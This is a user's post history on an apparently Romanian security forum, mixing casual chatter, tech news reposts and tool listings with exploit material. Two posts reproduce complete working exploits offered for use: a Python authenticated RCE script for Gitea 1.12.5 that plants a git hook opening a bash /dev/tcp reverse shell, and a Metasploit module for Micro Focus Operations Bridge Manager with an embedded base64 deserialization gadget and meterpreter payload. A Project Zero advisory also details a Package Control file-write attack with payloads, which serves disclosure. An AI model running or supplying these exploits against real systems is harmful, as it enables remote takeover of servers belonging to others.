Jump to content

Kev

Active Members
  • Posts

    1026
  • Joined

  • Days Won

    55

Everything posted by Kev

  1. Bun, deci am urmatorul cod Login.php: Incerc sa protejez index.html. Unde gresesesc? Linia 40 Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in /home/hosting/Login.php on line 40 Edit:/ am modificat " Linia 65: Parse error: syntax error, unexpected $end in /home/hosting/Login.php on line 65 Thanks
  2. Facebook has removed a group of China-based hackers it says targeted members of the Uighur community living abroad. It said hackers used malicious websites and apps to infect devices and allow for remote surveillance, with journalists and activists targeted. A majority of the cyber attacks didn't happen directly on Facebook but used the social media platform to share links to infected sites. This is not the first time hackers have been accused of such activity. The Uighurs are originally from the north-western region of Xinjiang in China and those targeted are currently living in places including Turkey, the United States, Australia and Canada. Facebook said it removed accounts - which totalled fewer than 100 - it found to have been created by the hackers, a group known as Earth Empusa or Evil Eye. It believes fewer than 500 accounts were targeted. Facebook says some of the ways the group infected devices included: creating fake Uighur-themed apps for the Android app store, including a prayer app and a dictionary app posing on Facebook as journalists, students, human rights advocates or members of the Uighur community, building trust and tricking them into clicking on malicious links creating look-alike websites for popular Uighur and Turkish news websites The Chinese Embassy in Washington has yet to comment. China is facing mounting criticism from around the world over its treatment of the mostly Muslim Uighur population in Xinjiang. Rights groups believe China has detained more than a million Uighurs over the past few years. China denies allegations of abuse, saying camps in the region are "re-education" facilities used to combat terrorism. Via bbc.com
  3. Multumesc pentru raspuns. Cu cine am discutat a vorbit despre Code Snippets, vom face un tutorial si il vom posta aici.
  4. Contribui pe partea hardware (am ceva piese noi, ramase pe stoc)
  5. Concret te ajut eu, "blackfriday bot Wav3" Succes!
  6. Privacy. Are we there yet? No, but there's some progress at least When version 90 of Google's Chrome browser arrives in mid-April, initial website visits will default to a secure HTTPS connection in the event the user has failed to specify a preferred URI scheme. Lack of security is currently the norm in Chrome. As Google Chrome software engineers Shweta Panditrao and Mustafa Emre Acer explain in a blog post, when a user types "www.example.com" into Chrome's omnibox, without either an "http://" or "https:// prefix," Chrome chooses "http://." The same is true in other browsers like Brave, Edge, Mozilla, and Safari. This made sense in the past when most websites had not implemented support for HTTPS. It was only in 2018 that the majority of websites redirected traffic to HTTPS. But these days, most of the web pages loaded rely on secure transport (ranging from about 98 per cent on Chrome to about 77 per cent on Linux). And among the top 100 websites, 97 of them currently default to HTTPS. Previously, only websites that declared they should be loaded securely with an entry on an HTTP Strict Transport Security (HSTS) preload list – supported in multiple browsers – got HTTPS automatically. Chrome 90 will make HTTPS the default for first time website visits where no transport has been declared. Beyond the security and privacy benefits, say Panditrao and Acer, this will improve performance since the delay incurred by redirection from an http:// endpoint to an https:// endpoint will no longer happen. A few exceptions will persist, however. IP addresses, single label domains (eg contoso without TLD like .com), and reserved hostnames like localhost/ will still default to http://. Private like a fox In other browser-related news, Mozilla Firefox 87 debuted on Tuesday with a privacy feature called SmartBlock. Borrowing from techniques used by privacy-focused extensions NoScript and uBlock Origin (eg "stub scripts"), SmartBlock provides a way to block tracking scripts while attempting to minimize performance-affecting delays or errors that can arise from meddling with webpage code. Firefox SmartBlock can replace trackers found on the extensive Disconnect Tracking Protection List, which just for the US numbers well over a thousand. Firefox 87 also incorporates another privacy enhancement: It will limit the information contained in the referrer (misspelled but implemented as "Referer") header string by setting its default Referrer-Policy to "strict-origin-when-cross-origin." What this means is that when a Firefox user follows a link like "https://www.example.com/path?query" – where "path" and "query" represent more meaningful or sensitive information – the HTTP Referer Header that gets sent to the visited website will indicate that the visitor has arrived from "https://www.example.com" and the extra path and query data will be dropped. ® Via theregister.com
  7. nu e singur, acum ceva ani, si-au facut selfie cu tabla in backgound U.S. Navy pe care scria parola de MySql123
  8. Salut Pe un blog de traveling in WordPress avand instalat pe el plug-in Meow Gallery Vreau ca toate imaginile pe care le uploadez sa fie redenumite automat; ex: director: Constanta Costinesti.jpg Costinesti-01.jpg Costinesti-02.jpg Costinesti-03.jpg ... Brasov CastelulBran.jpg CastelulBran1.jpg CastelulBran2.jpg CastelulBran3.jpg ... Ce trebuie sa completez in campul Advanced Custom Fields? Multumesc anticipat
  9. Joaca-te in continuare
  10. Kev

    Buna seara

    Bun venit! S N-auzi Nickname Ioutzi e putulica mica nu te impacienta
  11. grep Edit: Cu placere https://www.digitalocean.com/community/tutorials/using-grep-regular-expressions-to-search-for-text-patterns-in-linux
  12. Subscribe: aveti sursele puse in ToS Edit: Cu alte cuvinte :sunteti pe propria raspundere: ce balarii gasiti prin trash
  13. Package Control suffers from an arbitrary file write vulnerability. Package Control: Arbitrary File Write on packagecontrol.io Package Control is a popular package manager for Sublime Text with over 19.77M users and around 65k daily package installs. packagecontrol.io is its main website and hosts the default channel (https://packagecontrol.io/channel_v3.json) used for installing and updating packages. packagecontrol.io supports validation of Package Control's Repository JSON format via the packagecontrol.io/test_repo endpoint. This endpoint passes the (JSON-decoded) POST body directly to the run_tests function defined in app/lib/run_repo_tests.py (https://github.com/wbond/packagecontrol.io/blob/1629533ad44cbea6258a172876f06e1bbb7db14f/app/lib/run_repo_tests.py#L69): While the overall validation logic is somewhat complex, we are only interested in the final steps where a package is downloaded and its content analyzed. Most packages are hosted on Github or Bitbucket and use branch or tag based version management, but it is still possible to manually specify a download URL by using a JSON configuration like the one shown below: { \"name\":\"test\", \"author\":\"Felix Wilhelm\", \"releases\":[ { \"version\":\"2.0.0\", \"url\":\"http://plugin-host/package.zip\", \"date\":\"2021-02-25 10:00:00\", \"sublime_text\":\"*\" } ] } For configurations like this, the validation routine downloads the package ZIP file from the user supplied URL, extracts it and runs a number of \u"file checkers\u" on the package files. This is implemented in the code snippet shown below: tmpdir = tempfile.mkdtemp() if not tmpdir: return build_result([format_report('Could not create temp dir')], []) tmp_package_path = os.path.join(tmpdir, '%s.sublime-package' % name) **A** tmp_package_dir = os.path.join(tmpdir, name) **B** os.mkdir(tmp_package_dir) with open(tmp_package_path, 'wb') as package_file, downloader(url, settings) as manager: try: package_file.write(manager.fetch(url, 'fetching package')) except DownloaderException as e: ... with zipfile.ZipFile(tmp_package_path, 'r') as package_zip: # Scan through the root level of the zip file to gather some info root_level_paths = [] last_path = None for path in package_zip.namelist(): if not isinstance(path, str): path = path.decode('utf-8', 'strict') last_path = path if path.find('/') in [len(path) - 1, -1]: root_level_paths.append(path) # Make sure there are no paths that look like security vulnerabilities if path[0] == '/' or '../' in path or '..\\\\' in path: **C** errors.append(format_report('The path \"%s\" appears to be attempting to access other parts of the filesystem' % path)) return build_result(errors, warnings) if last_path and len(root_level_paths) == 0: root_level_paths.append(last_path[0:last_path.find('/') + 1]) # If there is only a single directory at the top level, the file # is most likely a zip from BitBucket or GitHub and we need # to skip the top-level dir when extracting skip_root_dir = len(root_level_paths) == 1 and \\ root_level_paths[0].endswith('/') for path in package_zip.namelist(): dest = path if not isinstance(dest, str): dest = dest.decode('utf-8', 'strict') # If there was only a single directory in the package, we remove # that folder name from the paths as we extract entries if skip_root_dir: dest = dest[len(root_level_paths[0]):] dest = dest.replace('\\\\', '/') **D** dest = os.path.join(tmp_package_dir, dest) dest = os.path.abspath(dest) # Make sure there are no paths that look like security vulnerabilities if not dest.startswith(tmp_package_dir): ** E ** errors.append(format_report('The path \"%s\" appears to be attempting to access other parts of the filesystem' % path)) return build_result(errors, warnings) if path.endswith('/'): if not os.path.exists(dest): os.makedirs(dest) else: dest_dir = os.path.dirname(dest) if not os.path.exists(dest_dir): os.makedirs(dest_dir) with open(dest, 'wb') as f: f.write(package_zip.read(path)) tmp_package_dir_pathlib = pathlib.Path(tmp_package_dir) for checker in file_checkers.get_checkers(): ... The code first creates a temporary directory to store both the zip archive and the extracted content. It then downloads the zip archive and tries to extract all files while making sure that no directory traversal attacks can be used to write to locations outside of the temporary directory. However, there are multiple problems that still make such an attack possible: 1. The name variable is coming from the attacker controlled JSON file and used without any validation (A). This makes it possible to create arbitrary directories by using a directory traversal \u"../../../../tmp/test\u" or even an absolute file path \u"/tmp/test\u" as the name field of the package. Absolute paths work because os.path.join has the following feature: \u"If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.\u" (https://docs.python.org/3/library/os.path.html) 2. We can also create an arbitrary file with controlled content and the ending \u".sublime-package\u" somewhere on the file system (B). On most systems this should already be enough to get arbitrary code execution. 3. However, we can use another bug to create files with controlled content and a controlled name: While the code checks for absolute file paths and directory traversals attempts in all compressed file paths (C), it does not check for absolute file paths starting with a backslash. This is a problem, because backslashes get converted to forward slashes in (D). We can use this behavior and the os.path.join call to put an arbitrary path in the dest variable by using a file path like \u"\ mp/test\u". The final check in (E) is not a problem for an attacker as tmp_package_dir is completely attacker controlled (see 1.) Putting this together, an attacker can write arbitrary files on the packagecontrol.io host by combining a JSON payload like { \"name\":\"/tmp/test\", \"author\":\"Felix Wilhelm\", \"releases\":[ { \"version\":\"2.0.0\", \"url\":\"http://plugin-host/evil.zip\", \"date\":\"2021-02-25 10:00:00\", \"sublime_text\":\"*\" } ] } With a zip file with the following contents (see attachment) unzip -l evil.zip Archive: evil.zip Length Date Time Name --------- ---------- ----- ---- 10 2021-02-25 11:22 \ mp/test1234 0 2021-02-25 11:30 a/ 0 2021-02-25 11:30 b/ --------- ------- 10 3 files This will create the file /tmp/test1234 (and a directory /tmp/test) A practical attack would either try to achieve RCE by overwriting some script files or directly backdoor channel_v3.json to push malicious updates to Package Control users. Fix Suggestion: The patch below should fix the described issues in the short term. However, I think a better way to address these issues would be to move the whole validation logic (including the file checkers) into a low privileged/sandboxed context. This would reduce the risk of similar bugs popping up. diff --git a/app/lib/run_repo_tests.py b/app/lib/run_repo_tests.py index d80895a..8bfdc01 100644 --- a/app/lib/run_repo_tests.py +++ b/app/lib/run_repo_tests.py @@ -112,6 +112,10 @@ def run_tests(spec): settings = downloader_settings() name = info['name'] + if '/' in name or '\\\\' in name: + errors.append(format_report('The name \"%s\" contains invalid characters' % name)) + return build_result(errors, warnings) + tmpdir = tempfile.mkdtemp() if not tmpdir: return build_result([format_report('Could not create temp dir')], []) @@ -140,7 +144,7 @@ def run_tests(spec): if path.find('/') in [len(path) - 1, -1]: root_level_paths.append(path) # Make sure there are no paths that look like security vulnerabilities - if path[0] == '/' or '../' in path or '..\\\\' in path: + if path[0] == '/' or path[0]=='\\\\' or '../' in path or '..\\\\' in path: errors.append(format_report('The path \"%s\" appears to be attempting to access other parts of the filesystem' % path)) return build_result(errors, warnings) There is also a pretty big risk of SSRF attacks, as the download manager does not perform any validation of the url prior to fetching it. For example, an attacker could use this to send requests to the redis instance listening on localhost. This is pretty difficult to fix correctly so one idea might be to remove support for non github/bitbucket packages (and therefore attacker specified URLs) from run_repo_tests. This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2021-05-26. Disclosure at an earlier date is also possible if agreed upon by all parties. Found by: fwilhelm@google.com Download GS20210226161937.tgz (3.9 KB) Source
  14. Kev

    Useful stuff

    Pentru ambidextru/ambidextre Link: https://aposymbiont.github.io/split-keyboards/
  15. Gitea version 1.12.5 suffers from a remote code execution vulnerability. # Exploit Title: Gitea 1.12.5 - Remote Code Execution (Authenticated) # Date: 17 Feb 2020 # Exploit Author: Podalirius # PoC demonstration article: https://podalirius.net/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/ # Vendor Homepage: https://gitea.io/ # Software Link: https://dl.gitea.io/ # Version: >= 1.1.0 to <= 1.12.5 # Tested on: Ubuntu 16.04 with GiTea 1.6.1 #!/usr/bin/env python3 # -*- coding: utf-8 -*- import argparse import os import pexpect import random import re import sys import time import requests requests.packages.urllib3.disable_warnings() requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' try: requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' except AttributeError: pass class GiTea(object): def __init__(self, host, verbose=False): super(GiTea, self).__init__() self.verbose = verbose self.host = host self.username = None self.password = None self.uid = None self.session = None def _get_csrf(self, url): pattern = 'name="_csrf" content="([a-zA-Z0-9\-\_=]+)"' csrf = [] while len(csrf) == 0: r = self.session.get(url) csrf = re.findall(pattern, r.text) time.sleep(1) csrf = csrf[0] return csrf def _get_uid(self, url): pattern = 'name="_uid" content="([0-9]+)"' uid = re.findall(pattern, self.session.get(url).text) while len(uid) == 0: time.sleep(1) uid = re.findall(pattern, self.session.get(url).text) uid = uid[0] return int(uid) def login(self, username, password): if self.verbose == True: print(" [>] login('%s', ...)" % username) self.session = requests.Session() r = self.session.get('%s/user/login' % self.host) self.username = username self.password = password # Logging in csrf = self._get_csrf(self.host) r = self.session.post( '%s/user/login?redirect_to=%%2f%s' % (self.host, self.username), data = {'_csrf':csrf, 'user_name':username, 'password':password}, allow_redirects=True ) if b'Username or password is incorrect.' in r.content: return False else: # Getting User id self.uid = self._get_uid(self.host) return True def repo_create(self, repository_name): if self.verbose == True: print(" [>] Creating repository : %s" % repository_name) csrf = self._get_csrf(self.host) # Create repo r = self.session.post( '%s/repo/create' % self.host, data = { '_csrf' : csrf, 'uid' : self.uid, 'repo_name' : repository_name, 'description' : "Lorem Ipsum", 'gitignores' : '', 'license' : '', 'readme' : 'Default', 'auto_init' : 'off' } ) return None def repo_delete(self, repository_name): if self.verbose == True: print(" [>] Deleting repository : %s" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings' % (self.host, self.username, repository_name)) # Delete repository r = self.session.post( '%s/%s/%s/settings' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'action' : "delete", 'repo_name' : repository_name } ) return def repo_set_githook_pre_receive(self, repository_name, content): if self.verbose == True: print(" [>] repo_set_githook_pre_receive('%s')" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name)) # Set pre receive git hook r = self.session.post( '%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'content' : content } ) return def repo_set_githook_update(self, repository_name, content): if self.verbose == True: print(" [>] repo_set_githook_update('%s')" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name)) # Set update git hook r = self.session.post( '%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'content' : content } ) return def repo_set_githook_post_receive(self, repository_name, content): if self.verbose == True: print(" [>] repo_set_githook_post_receive('%s')" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name)) # Set post receive git hook r = self.session.post( '%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'content' : content } ) return def logout(self): if self.verbose == True: print(" [>] logout()") # Logging out r = self.session.get('%s/user/logout' % self.host) return None def trigger_exploit(host, username, password, repository_name, verbose=False): # Create a temporary directory tmpdir = os.popen('mktemp -d').read().strip() os.chdir(tmpdir) # We create some files in the repository os.system('touch README.md') rndstring = ''.join([hex(random.randint(0,15))[2:] for k in range(32)]) os.system('echo "%s" >> README.md' % rndstring) os.system('git init') os.system('git add README.md') os.system('git commit -m "Initial commit"') # Connect to remote source repository os.system('git remote add origin %s/%s/%s.git' % (host, username, repository_name)) # Push the files (it will trigger post-receive git hook) conn = pexpect.spawn("/bin/bash -c 'cd %s && git push -u origin master'" % tmpdir) conn.expect("Username for .*: ") conn.sendline(username) conn.expect("Password for .*: ") conn.sendline(password) conn.expect("Total.*") print(conn.before.decode('utf-8').strip()) return None def header(): print(""" _____ _ _______ / ____(_)__ __| CVE-2020-14144 | | __ _ | | ___ __ _ | | |_ | | | |/ _ \/ _` | Authenticated Remote Code Execution | |__| | | | | __/ (_| | \_____|_| |_|\___|\__,_| GiTea versions >= 1.1.0 to <= 1.12.5 """) if __name__ == '__main__': header() parser = argparse.ArgumentParser(description='Process some integers.') parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Increase verbosity.') parser.add_argument('-t','--target', required=True, type=str, help='Target host (http://..., https://... or domain name)') parser.add_argument('-u','--username', required=True, type=str, default=None, help='GiTea username') parser.add_argument('-p','--password', required=True, type=str, default=None, help='GiTea password') parser.add_argument('-I','--rev-ip', required=False, type=str, default=None, help='Reverse shell listener IP') parser.add_argument('-P','--rev-port', required=False, type=int, default=None, help='Reverse shell listener port') parser.add_argument('-f','--payload-file', required=False, default=None, help='Path to shell script payload to use.') args = parser.parse_args() if (args.rev_ip == None or args.rev_port == None): if args.payload_file == None: print('[!] Either (-I REV_IP and -P REV_PORT) or (-f PAYLOAD_FILE) options are needed') sys.exit(-1) # Read specific payload file if args.payload_file != None: f = open(args.payload_file, 'r') hook_payload = ''.join(f.readlines()) f.close() else: hook_payload = """#!/bin/bash\nbash -i >& /dev/tcp/%s/%d 0>&1 &\n""" % (args.rev_ip, args.rev_port) if args.target.startswith('http://'): pass elif args.target.startswith('https://'): pass else: args.target = 'https://' + args.target print('[+] Starting exploit ...') g = GiTea(args.target, verbose=args.verbose) if g.login(args.username, args.password): reponame = 'vuln' g.repo_delete(reponame) g.repo_create(reponame) g.repo_set_githook_post_receive(reponame, hook_payload) g.logout() trigger_exploit(g.host, g.username, g.password, reponame, verbose=args.verbose) g.repo_delete(reponame) else: print('\x1b[1;91m[!]\x1b[0m Could not login with these credentials.') print('[+] Exploit completed !') Source
  16. acum am observat topic-ul, inainte sa-ti dau reply la pm, nu inteleg Edit: text nu ti-ai baut cafeaua, dormi ce ai, n'auzi ca omu vrea sa incarce si sa descarde db-uri
  17. Kev

    Va salut

    ai PM
  18. Puie Monta % $ 1000,000,000,000,000,00 st ti-l Dedidic pentru toata Dragostea mea Diavola,n fata ANAF
  19. Kev

    RSS-proxy

    RSS-proxy is a tool that allows you to do create an RSS/ATOM or JSON feed of almost any website, purely by analyzing just the static HTML structure. Try the live demo. Quickstart using docker The simplest way to use RSS-proxy is using docker docker pull damoeb/rss-proxy docker run -p 3000:3000 -it damoeb/rss-proxy Then open localhost:3000 in the browser. JavaScript Support rss-proxy supports dynamic webapps in a separate docker image damoeb/rss-proxy:js cause it is with 1GB quite large. Running this image will render a checkbox in the User Interface to pre-render a website in a headless browser, rather than using the static response. docker pull damoeb/rss-proxy:js docker run -p 3000:3000 -it damoeb/rss-proxy:js Developing RSS-proxy The project is separated into three modules core: the feed parser logic, plain JavaScript playground: the web app to visualize and explore feed generation proxy: the expressjs server For local development you need node 12+. Then follow these steps: Install all npm dependencies npm run install Start server cd packages/proxy && npm run start Start client cd packages/playground && npm run start Troubleshooting See troubleshooting. Changelog See changelog. Contributors damoeb Contact https://twitter.com/damoeb License This project uses the following license: GNU GPLv3. Download: rss-proxy-master.zip or git clone https://github.com/damoeb/rss-proxy.git Source
      • 1
      • Like
  20. Items in bold have a bonus interactive toy! Link: https://beej.us/blog/ Source: Beej's Bit Bucket
  21. This Metasploit module exploits an authenticated Java deserialization that affects a truckload of Micro Focus products: Operations Bridge Manager, Application Performance Management, Data Center Automation, Universal CMDB, Hybrid Cloud Management and Service Management Automation. However, this module was only tested on Operations Bridge Manager. Exploiting this vulnerability will result in remote code execution as the root user on Linux or the SYSTEM user on Windows. Authentication is required as the module user needs to login to the application and obtain the authenticated LWSSO_COOKIE_KEY, which should be fed to the module. Any authenticated user can exploit this vulnerability, even the lowest privileged ones. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Java::HTTP::ClassLoader prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Micro Focus Operations Bridge Manager Authenticated Remote Code Execution', 'Description' => %q{ This module exploits an authenticated Java deserialization that affects a truckload of Micro Focus products: Operations Bridge Manager, Application Performance Management, Data Center Automation, Universal CMDB, Hybrid Cloud Management and Service Management Automation. However this module was only tested on Operations Bridge Manager. Exploiting this vulnerability will result in remote code execution as the root user on Linux or the SYSTEM user on Windows. Authentication is required, the module user needs to login to the application and obtain the authenticated LWSSO_COOKIE_KEY, which should be fed to the module. Any authenticated user can exploit this vulnerability, even the lowest privileged ones. For more information refer to the advisory link below. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md'], [ 'CVE', '2020-11853'], [ 'ZDI', '20-1327'], ], 'DisclosureDate' => '2020-10-28', 'License' => MSF_LICENSE, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Privileged' => true, 'Targets' => [ ['Micro Focus Operations Bridge Manager <= 2020.05 (and many other MF products)', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'java/meterpreter/reverse_tcp' } ) ) register_options([ Opt::RPORT(443), OptString.new('TARGETURI', [true, 'Base path', '/']), OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]), OptString.new('LWSSO_COOKIE_KEY', [true, 'Authenticated LWSSO_COOKIE_KEY session cookie']) ]) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/topaz/login.jsp') }) # unfortunately could not find an easy way to detect the version running, even when auth if res && res.code == 200 && res.body.include?('Login - Operations Bridge Manager') return Exploit::CheckCode::Detected end return Exploit::CheckCode::Unknown end def exploit # Start our HTTP server to provide remote classloading @classloader_uri = start_service unless @classloader_uri fail_with(Failure::BadConfig, 'Could not start remote classloader server') end print_good("Started remote classloader server at #{@classloader_uri}") # heh, we got two of these, let's pick one randomly! vuln_uri = [ '/legacy/topaz/sitescope/conf/registration', '/legacy/topaz/sitescope/conf/download' ].sample # Send our remote classloader gadget to the target, triggering the vuln send_request_gadget( normalize_uri(target_uri.path, vuln_uri) ) end # Convenience method to send our gadget to a URI def send_request_gadget(uri) print_status("Sending remote classloader gadget to #{full_uri(uri)}") send_request_raw({ 'method' => 'POST', 'uri' => uri, 'cookie' => "LWSSO_COOKIE_KEY=#{datastore['LWSSO_COOKIE_KEY']}", 'headers' => { 'Content-Type' => 'application/octet-stream' }, 'data' => go_go_gadget }, 0) end # C3P0 payload generated with a ysoserial jar # The ysoserial jar needs to be built with c3p0 version 0.9.1.2 as that is what the target uses # See the advisory for details. # # java -jar ysoserial-0.0.6-SNAPSHOT-all-c3p0-0.9.1.2.jar C3P0 'http://whatever/:ExploitClass' | base64 def go_go_gadget gadget = Rex::Text.decode_base64( <<~EOF rO0ABXNyAChjb20ubWNoYW5nZS52Mi5jM3AwLlBvb2xCYWNrZWREYXRhU291cmNlZoRH/BzETxgC AAB4cgA1Y29tLm1jaGFuZ2UudjIuYzNwMC5pbXBsLkFic3RyYWN0UG9vbEJhY2tlZERhdGFTb3Vy Y2UAAAAAAAAAAQMAAHhyADFjb20ubWNoYW5nZS52Mi5jM3AwLmltcGwuUG9vbEJhY2tlZERhdGFT b3VyY2VCYXNlAAAAAAAAAAEDAAdJABBudW1IZWxwZXJUaHJlYWRzTAAYY29ubmVjdGlvblBvb2xE YXRhU291cmNldAAkTGphdmF4L3NxbC9Db25uZWN0aW9uUG9vbERhdGFTb3VyY2U7TAAOZGF0YVNv dXJjZU5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABRmYWN0b3J5Q2xhc3NMb2NhdGlvbnEAfgAE TAANaWRlbnRpdHlUb2tlbnEAfgAETAADcGNzdAAiTGphdmEvYmVhbnMvUHJvcGVydHlDaGFuZ2VT dXBwb3J0O0wAA3Zjc3QAIkxqYXZhL2JlYW5zL1ZldG9hYmxlQ2hhbmdlU3VwcG9ydDt4cHcCAAFz cgA9Y29tLm1jaGFuZ2UudjIubmFtaW5nLlJlZmVyZW5jZUluZGlyZWN0b3IkUmVmZXJlbmNlU2Vy aWFsaXplZGIZhdDRKsITAgAETAALY29udGV4dE5hbWV0ABNMamF2YXgvbmFtaW5nL05hbWU7TAAD ZW52dAAVTGphdmEvdXRpbC9IYXNodGFibGU7TAAEbmFtZXEAfgAJTAAJcmVmZXJlbmNldAAYTGph dmF4L25hbWluZy9SZWZlcmVuY2U7eHBwcHBzcgAWamF2YXgubmFtaW5nLlJlZmVyZW5jZejGnqKo 6Y0JAgAETAAFYWRkcnN0ABJMamF2YS91dGlsL1ZlY3RvcjtMAAxjbGFzc0ZhY3RvcnlxAH4ABEwA FGNsYXNzRmFjdG9yeUxvY2F0aW9ucQB+AARMAAljbGFzc05hbWVxAH4ABHhwc3IAEGphdmEudXRp bC5WZWN0b3LZl31bgDuvAQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwAL ZWxlbWVudERhdGF0ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFu Zy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQADEV4cGxvaXRDbGFzc3QAEGh0 dHA6Ly93aGF0ZXZlci90AAdleHBsb2l0cHBwdwQAAAAAeHcCAAF4 EOF ) # Replace length-prefixed placeholder strings with our own gadget.sub!("\x00\x10http://whatever/", packed_classloader_uri) gadget.sub!("\x00\x07exploit", packed_class_name) gadget.sub("\x00\x0cExploitClass", packed_class_name) end # Convenience method to pack the classloader URI as a length-prefixed string def packed_classloader_uri "#{[@classloader_uri.length].pack('n')}#{@classloader_uri}" end end # 0day.today [2021-02-11] # Source
  22. tinere, ce fumez, ce nu fumez, este o duba cu ferstre opace/mat care tot se plimba dupe mine. Cu cine am discutat mi-au spus ca sunt foarte scumpe lanternele, din ancest motiv am intrebat de app Multumesc oricum Edit/ "pretenas" am permis auto din perioada in care tu nu erai proiectat pe țeavã, cunosc toatã lista de branduri, de automobile, de la Mobra cu ataș -> Lãstun -> Ferrari Edit3: ah, apropo mananci cam mult "copii" PS: lasã "miștourile"
  23. Microsoft Windows has a privilege escalation vulnerability. When a process is running in a server silo, the checks for trusted hive registry key symbolic links is disabled leading to elevation of privilege. Download GS20210210152159.tgz (5.4 KB) Source
  24. Data privacy and security is an essential R&D stage for many applications. Here, we’ll walk you through on how to securely handle sensitive or personal information in your applications and reduce their chance of leaking. There are all kinds of data obfuscation tools out there. Instead of covering them, we’ll share: How we implement our own ways to protect PII Some of our data-masking techniques MASKING SENSITIVE DATA SHOULD BE A DEFAULT – PHOTO BY DAYNE TOPKIN ON UNSPLASH What is PII? Personally identifiable information (PII) is any data used to identify, locate, or contact an individual. Data privacy regulations each have their own standards of what constitutes PII, so be mindful of what PII you should protect. For starters, check out how The National Institute of Standards and Technology(NIST) classifies PII. What is Sensitive Data? While the term looks self-explanatory, boundaries separating data from being sensitive can still be blurry. So let’s resort to the definitions from the European Commission. The following are considered sensitive data: personal data revealing racial or ethnic origin, political opinions, religious or philosophical beliefs; trade-union membership; genetic data, biometric data processed solely to identify a human being; health-related data; data concerning a person’s sex life or sexual orientation. In this walkthrough, we will use PII and sensitive data interchangeably. But in real life, sensitive data often refers to something more general and broad, while PII has a stricter definition. Why is protecting PII/sensitive data so important? Information and data privacy regulations and laws compel you to do so. Nobody wants to get slapped with a hefty fine! The European Union’s (EU’s) General Data Protection Regulation (GDPR) comes to mind. Depending on the nature of your application, it has to comply with data privacy requirements for it to be legally released and used by the end users. Besides, keeping the user’s data secure and private must be a default to any developer. Right, even if your team have the correct attitude, it’s often a careless mistake that causes a sensitive data exposure. Awareness is key to avoid this, hopefully this piece will provide some insights. Onto the walkthrough! The examples below are in Kotlin, but the underlying concepts and principles are all applicable to different kinds of software development, especially on the front end. Data Class Sensitive<T> – Masking Sensitive Data by Default Here’s our very own data-masking tool. When a data field itself contains some sensitive value, it should be encapsulated within the below data class to achieve data obfuscation by default. Since the toString() method is overridden, where “masked” is always returned, its actual value can’t be printed out unless explicitly requested. Access to sensitive or restricted information is controlled this way, reminding the developers not expose one. Below is a data-masking example class written in Kotlin: data class Sensitive<T>(private val data: T) { override fun toString() = "masked" fun getSensitive(): T = data } A hint – some programming languages support memory erasure, you may want to implement a clear() function with that. Here’s an example data class User where three of its properties are considered sensitive, which hence needs data masking with Sensitive<T>: data class User( val name: Sensitive<String>, val email: Sensitive<String>, val cardLast4: Sensitive<String>, val username: String ) Below is a demo on masking with Sensitive<T>: data class Sensitive<T>(private val data: T) { override fun toString() = "masked" fun getSensitive(): T = data } data class User( val name: Sensitive<String>, val email: Sensitive<String>, val cardLast4: Sensitive<String>, val username: String ) fun main() { val user = User( Sensitive("Elliot"), Sensitive("elliot@oursky.com"), Sensitive("1234"), "elliot" ) println(user) println(user.name.getSensitive()) } An interactive code snippet is available here, try run it! The result should be: User(name=masked, email=masked, cardLast4=masked, username=elliot) Elliot Explicitly Obtain Sensitive Data In cases where the developer really has to obtain a sensitive data field, they can do so by calling the function getSensitive() from the data class Sensitive<T>. Such operation is intentionally designed to be inconvenient so the developer will need to think twice before impetuously printing PII to the console. Track Exposed Sensitive Data To visualize which part of code explicitly requested to expose sensitive data, type the following grep command in your terminal: grep -nR getSensitive . This can be effortlessly integrated into a CI pipeline to conduct auto checks on exposed sensitive data. Build InputFields and Picker with Sensitive<T> By wrapping standard UI widgets regardless of the platform (iOS, Android, web), you can build input components like InputFields or DatePicker that return Sensitive<T>. Doing this secures an input flow on sensitive data, from the second an end user starts entering data to the end of your process. This should be applied on all input components that contain sensitive data, where processes like masking credit card numbers or phone numbers become automatic. Let’s say a user is entering a credit card CVC. We’ll always handle it with a SensitiveInputField that returns Sensitive<String>. The actual CVC value is hidden until the stage of serialization (for data transit), which minimizes direct contact. In other words, a masked credit card CVC value becomes the default output from the user input process. Disable Screenshot and Background Preview when Handling Sensitive Information Thorough understandings on behaviours of the underlying operation system is also essential to a secure 